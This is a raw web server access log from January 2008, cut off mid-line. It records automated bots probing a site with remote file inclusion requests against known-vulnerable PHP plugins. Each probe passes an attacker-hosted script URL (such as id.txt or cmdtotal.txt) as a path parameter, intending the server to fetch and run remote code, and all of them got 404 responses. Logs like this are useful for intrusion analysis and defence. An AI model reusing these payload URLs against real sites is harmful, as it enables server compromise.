213.164.242.195 - - [27/Jan/2008:19:00:21 -0800] "GET //wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.164.242.195 - - [27/Jan/2008:19:00:21 -0800] "GET //wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.164.242.195 - - [27/Jan/2008:19:00:21 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:19:00:25 -0800] "GET /logs/access_071224.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
213.164.242.195 - - [27/Jan/2008:19:00:26 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:19:00:28 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:19:00:28 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
205.196.221.225 - - [27/Jan/2008:19:01:08 -0800] "GET /logs/access_080107.log//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
205.196.221.225 - - [27/Jan/2008:19:01:08 -0800] "GET //wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
205.196.221.225 - - [27/Jan/2008:19:01:08 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:19:01:54 -0800] "GET /logs/access_070826.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
63.247.71.114 - - [27/Jan/2008:19:01:58 -0800] "GET /logs/access_080107.log//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.247.71.114 - - [27/Jan/2008:19:01:58 -0800] "GET //wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.247.71.114 - - [27/Jan/2008:19:01:58 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.233.24 - - [27/Jan/2008:19:02:20 -0800] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.233.24 - - [27/Jan/2008:19:02:21 -0800] "GET //includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.233.24 - - [27/Jan/2008:19:02:22 -0800] "GET /logs//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.75 - - [27/Jan/2008:19:03:08 -0800] "GET /logs/access_071231.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.96.247.163 - - [27/Jan/2008:19:03:39 -0800] "GET /logs/access.log//login.php?dir=http://scottmouse.no-ip.biz/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.96.247.163 - - [27/Jan/2008:19:03:40 -0800] "GET //login.php?dir=http://scottmouse.no-ip.biz/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.96.247.163 - - [27/Jan/2008:19:03:41 -0800] "GET /logs//login.php?dir=http://scottmouse.no-ip.biz/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.199.102.117 - - [27/Jan/2008:19:03:41 -0800] "GET /logs/access.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.venox.xpg.com.br/s